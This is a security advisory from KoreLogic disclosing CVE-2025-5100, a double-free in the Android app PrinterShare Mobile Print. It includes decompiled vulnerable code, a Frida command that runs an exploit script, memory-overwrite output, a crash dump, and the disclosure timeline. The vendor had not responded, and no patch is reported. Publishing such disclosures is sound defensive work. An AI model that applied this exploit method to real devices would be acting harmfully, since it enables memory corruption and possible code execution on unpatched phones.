-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-005: Mobile Dynamix PrinterShare Mobile Print Double-Free Memory Write Title: Mobile Dynamix PrinterShare Mobile Print Double-Free Memory Write Advisory ID: KL-001-2025-005 Publication Date: 2025-05-22 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-005.txt 1. Vulnerability Details Affected Vendor: Mobile Dynamix Affected Product: PrinterShare Mobile Print Affected Version: up to 12.15.01 Platform: Android CWE Classification: CWE-415: Double-Free, CWE-416: Use-After-Free CVE ID: CVE-2025-5100 2. Vulnerability Description A double-free condition occurs during the cleanup of temporary image files, which can be exploited to achieve memory corruption and potentially arbitrary code execution. 3. Technical Description * Performed on Android 13 aarch64 - Samsung Rooted (Galaxy Tab A7 Lite) * Using Frida client on Ubuntu 24.04 LTS - Frida server on Samsung Rooted Device. * Playstore location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US * The target Activity is exported true. Which means any application may interact with it, given that permissions are provided. The vulnerability is in the bitmap handling in ActivityPrintPictures. The v1() method loads bitmaps from files or content URIs. The method then calls x1() after attempting to decode a bitmap. In the exception handler for OutOfMemoryError, it recycles the bitmap. The x1() method (visible in the Frida hooks) creates a 512x512 bitmap and immediately recycles it. An OutOfMemoryError happens during bitmap loading in v1(); the bitmap is recycled in the error handler. public Bitmap v1(l lVar) { Bitmap bitmap = null; boolean z2 = false; for (int i3 = 0; i3 < 3; i3++) { try { B.e(); BitmapFactory.Options options = new BitmapFactory.Options(); options.inPreferredConfig = Bitmap.Config.ARGB_8888; options.inDither = false; if (i3 > 0) { options.inSampleSize = 1 << i3; } InputStream fileInputStream = lVar.f5200c != null ? new FileInputStream(lVar.f5200c) : getContentResolver().openInputStream(lVar.f5198a); if (fileInputStream != null) { bitmap = BitmapFactory.decodeStream(fileInputStream, null, options); fileInputStream.close(); } x1(); break; } catch (IOException e3) { e3.printStackTrace(); B.A(e3); } catch (OutOfMemoryError unused) { if (bitmap != null) { bitmap.recycle(); bitmap = null; } if (!z2 && i3 > 0) { B.a(); z2 = true; } } } return bitmap; } Then x1() is called which creates and recycles another bitmap. private void x1() { Bitmap createBitmap = Bitmap.createBitmap(512, 512, Bitmap.Config.ARGB_8888); if (createBitmap != null) { createBitmap.recycle(); } } The Android memory allocator may reuse the same memory block, which results in the same address being freed twice (double-free). Demonstrating the leaking of memory by running the frida script. This first intercepts freed memory chunks, then writes to that memory and monitors the cache. $ frida -U -f com.dynamixsoftware.printershare -l exploit.js ____ / _ | Frida 16.6.5 - A world-class dynamic instrumentation toolkit | (_| | > _ | Commands: /_/ |_| help -> Displays the help system . . . . object? -> Display information about 'object' . . . . exit/quit -> Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to SM T220 (id=R83X10JATAV) Spawning `com.dynamixsoftware.printershare`... [+] Found 'free' function at 0x78b4adbf30 in module: libc.so [+] Double-free exploitation script initialized [+] Targeting the v1()->x1() bitmap handling vulnerability [+] Waiting for free() calls to intercept... Spawned `com.dynamixsoftware.printershare`. Resuming main thread! [SM T220::com.dynamixsoftware.printershare ]-> ...SNIP... === Memory at 0xb400007820205700 AFTER overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... [+] Immediate exploitation succeeded for 0xb400007820205700 === Memory at 0xb4000078202ad320 BEFORE overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 4d dalvik/system/VM 00000010 52 75 6e 74 69 6d 65 00 65 61 64 3b 00 00 00 00 Runtime.ead;.... 00000020 10 71 a1 1d 78 00 00 00 ff ff ff ff ff ff ff ff .q..x........... 00000030 00 00 00 00 00 00 00 00 20 d3 2a 20 78 00 00 b4 ........ .* x... 00000040 01 00 00 00 02 00 00 00 08 8a 31 20 78 00 00 b4 ..........1 x... 00000050 00 00 00 00 00 00 00 00 60 d2 2a 20 78 00 00 b4 ........`.* x... 00000060 41 84 07 1d 78 00 00 00 00 66 2f 20 78 00 00 b4 A...x....f/ x... 00000070 00 00 00 00 00 00 00 00 98 d2 2a 20 78 00 00 b4 ..........* x... [+] Successfully wrote 500 bytes to 0xb4000078202ad320 === Memory at 0xb4000078202ad320 AFTER overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... [+] Immediate exploitation succeeded for 0xb4000078202ad320 === Memory at 0xb4000078202ad300 BEFORE overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 4c 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 Ldalvik/system/V 00000010 4d 52 75 6e 74 69 6d 65 3b 00 00 00 1e 00 00 00 MRuntime;....... 00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... [+] Successfully wrote 500 bytes to 0xb4000078202ad300 === Memory at 0xb4000078202ad300 AFTER overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... [+] Immediate exploitation succeeded for 0xb4000078202ad300 === Memory at 0xb4000078202ad2e0 BEFORE overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 64 61 6c 76 69 6b 2e 73 79 73 74 65 6d 2e 56 4d dalvik.system.VM 00000010 52 75 6e 74 69 6d 65 00 61 64 00 20 78 00 00 b4 Runtime.ad. x... 00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... [+] Successfully wrote 500 bytes to 0xb4000078202ad2e0 === Memory at 0xb4000078202ad2e0 AFTER overwrite === 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000030 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000040 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000050 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000060 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... 00000070 30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4 0...0...0...0... [+] Immediate exploitation succeeded for 0xb4000078202ad2e0 Process crashed: Bad access due to invalid address *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys' Revision: '0' ABI: 'arm64' Processor: '0' Timestamp: 2025-03-02 10:54:25.642520460-0800 Process uptime: 3s Cmdline: com.samsung.android.scs pid: 32625, tid: 32625, name: ung.android.scs >>> com.samsung.android.scs <<< uid: 10243 signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414140 x0 0000000000000001 x1 4141414141414141 x2 0000000072a27ffc x3 0000000000000001 x4 0000007feb0e8530 x5 000000781d065ee0 x6 000000000000001a x7 0000000000000018 x8 0000007feb0e87c0 x9 4141414141414140 x10 0000007feb0e8150 x11 0000000000000006 x12 0000000000000069 x13 000000781dc0e180 x14 000000781dc0c598 x15 0000000000000000 x16 0000000020000001 x17 0000000000000000 x18 00000078ccb6a000 x19 b400007820205650 x20 b400007820205660 x21 0000000072e625d0 x22 4141414141414141 x23 000000781d776d80 x24 b4000078202cd400 x25 00000078cc4c1000 x26 000000781dc0d000 x27 0000007feb0e8960 x28 b400007820244800 x29 0000007feb0e8900 lr 000000781d2cc408 sp 0000007feb0e86d0 pc 000000781d2cc190 pst 0000000080000000 backtrace: #00 pc 00000000002cc190 /apex/com.android.art/lib64/libart.so (artQuickResolutionTrampoline+2764) (BuildId: 629e0ffca501d809c29dbbeef2f512d3) #01 pc 000000000037ee08 /apex/com.android.art/lib64/libart.so (art_quick_resolution_trampoline+88) (BuildId: 629e0ffca501d809c29dbbeef2f512d3) #02 pc 0000000000780108 /apex/com.android.art/lib64/libart.so (nterp_helper+152) (BuildId: 629e0ffca501d809c29dbbeef2f512d3) #03 pc 000000000003fb3a /apex/com.android.conscrypt/javalib/conscrypt.jar (com.android.org.conscrypt.TrustedCertificateStore.setDefaultUserDirectory+14) #04 pc 0000000000b716dc /data/misc/apexdata/com.android.art/dalvik-cache/arm64/boot.oat (android.app.ActivityThread.main+764) *** [SM T220::com.dynamixsoftware.printershare ]-> 4. Mitigation and Remediation Recommendation No response from vendor. There are no known mitigations to end-users of the affected application versions. 5. Credit This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc. 6. Disclosure Timeline 2025-04-09 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com. 2025-04-11 : KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com. 2025-04-29 : KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com. 2025-05-22 : KoreLogic public disclosure. 7. Proof of Concept URL: https://korelogic.com/Resources/Advisories/KL-001-2025-005.poc.js.txt SHA256sum: 596c119c3b1ef6749d59ff5def5b2e88bca04dde15e86683d074d259458519da The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmgvpEUaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkelctA/+POSY+ChF4g3KZnqPxtKM vcjwjUGD1djyZZSfNbY/CXeG4JSLoOndi5DmBsiTo0nNKQr+5mQWSTDdBubyYhxS RrW6xgzLVSgkH5pEAzVHNw3M9QJRo08ZcpCG8ZsIwcoXbC1WsLlLrUsBJg59xpnJ LkeR9WCIe63HEAY96DkISAQF02uBCwbTEn5SizOAJEYgc93niHLrzld98Ep+5wF8 2yoFV28ew+rLb/wsEDo3Wstpyiti/xz2tel1mL7JQG0y4CXXF8X10QLap2exuoaI UAhrpMeNPuCPqE7yzKp2BuE1dsoi9xkjeclbuxD3tbM3wHzW+fAwoISR+KJ/OepA sgDiU8k72r5L+FdDaZ21+kFhH0OQSvSPoz6jsiLZXIZLzfIsW8MimRjhWMQ9CVG4 c6ufJZhZBFjFDUMDSehQQ9qk/sbLKwyHv9cSpxhZZILOdX8P5uNprYRVrG1v5s6J u5AMC5b5mHP/hWDzQukbv3zPStk9srFxV/dg7KJCXllKVJFycxV0dHYkumpQbROK muzjaItMOb7GX2ql2q9TxAoDH8w/HAwyUwawkUIBg2dC2W8UA2nG/YJHFRVMqeYY kAz8k034VtqpakysfTxx/Xk9vQ5tKsVX6C32QoWN9KFbjy6H2hmUha22W8EefEzz gPCebpiD2VqCd0qvCIs0+LM= =76Mi -----END PGP SIGNATURE-----